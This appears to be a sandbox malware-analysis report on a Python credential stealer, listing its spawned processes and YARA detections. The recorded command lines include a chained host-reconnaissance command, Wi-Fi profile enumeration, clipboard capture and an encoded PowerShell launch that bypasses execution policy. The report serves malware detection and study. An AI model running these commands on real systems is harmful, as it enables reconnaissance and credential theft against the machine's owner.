• Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, Author: Joe Security
• Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, Author: Joe Security
Reputation:low
Has exited:false

Target ID:4
Start time:04:46:11
Start date:15/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "ver"
Imagebase:0x7ff65c050000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:5
Start time:04:46:17
Start date:15/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tasklist"
Imagebase:0x7ff65c050000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:6
Start time:04:46:17
Start date:15/11/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist
Imagebase:0x7ff7a4af0000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:7
Start time:04:46:19
Start date:15/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
Imagebase:0x7ff65c050000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:04:46:19
Start date:15/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
Imagebase:0x7ff65c050000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:04:46:19
Start date:15/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd.exe /c chcp
Imagebase:0x7ff65c050000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:10
Start time:04:46:19
Start date:15/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:0x7ff65c050000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:11
Start time:04:46:19
Start date:15/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd.exe /c chcp
Imagebase:0x7ff65c050000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:12
Start time:04:46:19
Start date:15/11/2024
Path:C:\Windows\System32\chcp.com
Wow64 process (32bit):false
Commandline:chcp
Imagebase:0x7ff706090000
File size:14'848 bytes
MD5 hash:33395C4732A49065EA72590B14B64F32
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:13
Start time:04:46:19
Start date:15/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
Imagebase:0x7ff65c050000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:14
Start time:04:46:19
Start date:15/11/2024
Path:C:\Windows\System32\chcp.com
Wow64 process (32bit):false
Commandline:chcp
Imagebase:0x7ff706090000
File size:14'848 bytes
MD5 hash:33395C4732A49065EA72590B14B64F32
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:15
Start time:04:46:19
Start date:15/11/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FO LIST
Imagebase:0x7ff7a4af0000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:16
Start time:04:46:19
Start date:15/11/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell.exe Get-Clipboard
Imagebase:0x7ff7b2bb0000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:04:46:19
Start date:15/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
Imagebase:0x7ff65c050000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:04:46:19
Start date:15/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
Imagebase:0x7ff65c050000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:04:46:19
Start date:15/11/2024
Path:C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):false
Commandline:systeminfo
Imagebase:0x7ff6af120000
File size:110'080 bytes
MD5 hash:EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:04:46:19
Start date:15/11/2024
Path:C:\Windows\System32\netsh.exe
Wow64 process (32bit):false
Commandline:netsh wlan show profiles
Imagebase:0x7ff723720000
File size:96'768 bytes
MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:04:46:19
Start date:15/11/2024
Path:C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:0x7ff6616b0000
File size:496'640 bytes
MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:04:46:20
Start date:15/11/2024
Path:C:\Windows\System32\HOSTNAME.EXE
Wow64 process (32bit):false
Commandline:hostname
Imagebase:0x7ff781f10000
File size:14'848 bytes
MD5 hash:33AFAA43B84BDEAB12E02F9DBD2B2EE0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:04:46:20
Start date:15/11/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic logicaldisk get caption,description,providername
Imagebase:0x7ff7bc2b0000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:04:46:22
Start date:15/11/2024
Path:C:\Windows\System32\net.exe
Wow64 process (32bit):false
Commandline:net user
Imagebase:0x7ff7ab1d0000
File size:59'904 bytes
MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:04:46:22
Start date:15/11/2024
Path:C:\Windows\System32\net1.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\net1 user
Imagebase:0x7ff661450000
File size:183'808 bytes
MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:04:46:22
Start date:15/11/2024
Path:C:\Windows\System32\query.exe
Wow64 process (32bit):false
Commandline:query user
Imagebase:0x7ff622880000
File size:17'408 bytes
MD5 hash:29043BC0B0F99EAFF36CAD35CBEE8D45
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:04:46:22
Start date:15/11/2024
Path:C:\Windows\System32\quser.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\quser.exe"
Imagebase:0x7ff6cae20000
File size:25'600 bytes
MD5 hash:480868AEBA9C04CA04D641D5ED29937B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:04:46:22
Start date:15/11/2024
Path:C:\Windows\System32\net.exe
Wow64 process (32bit):false
Commandline:net localgroup
Imagebase:0x7ff7ab1d0000
File size:59'904 bytes
MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:30
Start time:04:46:23
Start date:15/11/2024
Path:C:\Windows\System32\net1.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\net1 localgroup
Imagebase:0x7ff661450000
File size:183'808 bytes
MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:31
Start time:04:46:23
Start date:15/11/2024
Path:C:\Windows\System32\net.exe
Wow64 process (32bit):false
Commandline:net localgroup administrators
Imagebase:0x7ff7ab1d0000
File size:59'904 bytes
MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:32
Start time:04:46:23
Start date:15/11/2024
Path:C:\Windows\System32\net1.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\net1 localgroup administrators
Imagebase:0x7ff661450000
File size:183'808 bytes
MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                                                                                        Target ID:33
                                                                                                                                                                                                                                        Start time:04:46:23
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:net user guest
                                                                                                                                                                                                                                        Imagebase:0x7ff7ab1d0000
                                                                                                                                                                                                                                        File size:59'904 bytes
                                                                                                                                                                                                                                        MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:34
                                                                                                                                                                                                                                        Start time:04:46:23
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\net1 user guest
                                                                                                                                                                                                                                        Imagebase:0x7ff661450000
                                                                                                                                                                                                                                        File size:183'808 bytes
                                                                                                                                                                                                                                        MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:35
                                                                                                                                                                                                                                        Start time:04:46:23
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:net user administrator
                                                                                                                                                                                                                                        Imagebase:0x7ff7ab1d0000
                                                                                                                                                                                                                                        File size:59'904 bytes
                                                                                                                                                                                                                                        MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:36
                                                                                                                                                                                                                                        Start time:04:46:23
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\net1 user administrator
                                                                                                                                                                                                                                        Imagebase:0x7ff661450000
                                                                                                                                                                                                                                        File size:183'808 bytes
                                                                                                                                                                                                                                        MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:37
                                                                                                                                                                                                                                        Start time:04:46:23
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe"
                                                                                                                                                                                                                                        Imagebase:0x7ff652c90000
                                                                                                                                                                                                                                        File size:13'747'712 bytes
                                                                                                                                                                                                                                        MD5 hash:4FD34971F2551E33806360BA5EE86E5E
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 39%, ReversingLabs
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:38
                                                                                                                                                                                                                                        Start time:04:46:24
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:39
                                                                                                                                                                                                                                        Start time:04:46:24
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:wmic startup get caption,command
                                                                                                                                                                                                                                        Imagebase:0x7ff7bc2b0000
                                                                                                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:40
                                                                                                                                                                                                                                        Start time:04:46:26
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:tasklist /svc
                                                                                                                                                                                                                                        Imagebase:0x7ff7a4af0000
                                                                                                                                                                                                                                        File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:41
Start time:04:46:27
Start date:15/11/2024
Path:C:\Windows\System32\ipconfig.exe
Wow64 process (32bit):false
Commandline:ipconfig /all
Imagebase:0x7ff67fed0000
File size:35'840 bytes
MD5 hash:62F170FB07FDBB79CEB7147101406EB8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:42
Start time:04:46:27
Start date:15/11/2024
Path:C:\Windows\System32\ROUTE.EXE
Wow64 process (32bit):false
Commandline:route print
Imagebase:0x7ff6814a0000
File size:24'576 bytes
MD5 hash:3C97E63423E527BA8381E81CBA00B8CD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:43
Start time:04:46:28
Start date:15/11/2024
Path:C:\Windows\System32\ARP.EXE
Wow64 process (32bit):false
Commandline:arp -a
Imagebase:0x7ff7fc850000
File size:26'624 bytes
MD5 hash:2AF1B2C042B83437A4BE82B19749FA98
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:44
Start time:04:46:28
Start date:15/11/2024
Path:C:\Windows\System32\NETSTAT.EXE
Wow64 process (32bit):false
Commandline:netstat -ano
Imagebase:0x7ff782190000
File size:39'936 bytes
MD5 hash:7FDDD6681EA81CE26E64452336F479E6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:45
Start time:04:46:28
Start date:15/11/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:sc query type= service state= all
Imagebase:0x7ff7942f0000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:46
Start time:04:46:28
Start date:15/11/2024
Path:C:\Windows\System32\netsh.exe
Wow64 process (32bit):false
Commandline:netsh firewall show state
Imagebase:0x7ff723720000
File size:96'768 bytes
MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:47
Start time:04:46:28
Start date:15/11/2024
Path:C:\Windows\System32\netsh.exe
Wow64 process (32bit):false
Commandline:netsh firewall show config
Imagebase:0x7ff723720000
File size:96'768 bytes
MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:48
Start time:04:46:29
Start date:15/11/2024
Path:C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe"
Imagebase:0x7ff72b610000
File size:24'189'952 bytes
MD5 hash:D71750B08D81D33E6BEAD1CEB707BC4F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000030.00000002.1538910940.000001E3006F8000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000030.00000002.1564862815.00007FF72C479000.00000002.00000001.01000000.0000002B.sdmp, Author: Joe Security
• Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000030.00000002.1564862815.00007FF72C479000.00000002.00000001.01000000.0000002B.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000030.00000002.1564862815.00007FF72C479000.00000002.00000001.01000000.0000002B.sdmp, Author: Joe Security
• Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000030.00000002.1539604466.000001E3007A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000030.00000000.1524655488.00007FF72C479000.00000002.00000001.01000000.0000002B.sdmp, Author: Joe Security
• Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000030.00000000.1524655488.00007FF72C479000.00000002.00000001.01000000.0000002B.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000030.00000000.1524655488.00007FF72C479000.00000002.00000001.01000000.0000002B.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exe, Author: Joe Security
• Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exe, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exe, Author: Joe Security
Has exited:true

Target ID:49
Start time:04:46:29
Start date:15/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:0x7ff65c050000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:50
                                                                                                                                                                                                                                        Start time:04:46:29
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                        Imagebase:0x7ff7bc2b0000
                                                                                                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:51
                                                                                                                                                                                                                                        Start time:04:46:30
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                                                                                                                                        Imagebase:0x7ff65c050000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:52
                                                                                                                                                                                                                                        Start time:04:46:30
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
                                                                                                                                                                                                                                        Imagebase:0x7ff65c050000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:53
                                                                                                                                                                                                                                        Start time:04:46:30
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                                                                                                                                                                                                                                        Imagebase:0x7ff7b2bb0000
                                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:54
                                                                                                                                                                                                                                        Start time:04:46:32
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.cmdline"
                                                                                                                                                                                                                                        Imagebase:0x7ff715b00000
                                                                                                                                                                                                                                        File size:2'759'232 bytes
                                                                                                                                                                                                                                        MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:55
                                                                                                                                                                                                                                        Start time:04:46:32
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe"
                                                                                                                                                                                                                                        Imagebase:0x7ff652c90000
                                                                                                                                                                                                                                        File size:13'747'712 bytes
                                                                                                                                                                                                                                        MD5 hash:4FD34971F2551E33806360BA5EE86E5E
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000037.00000003.1583982311.000002255B36D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
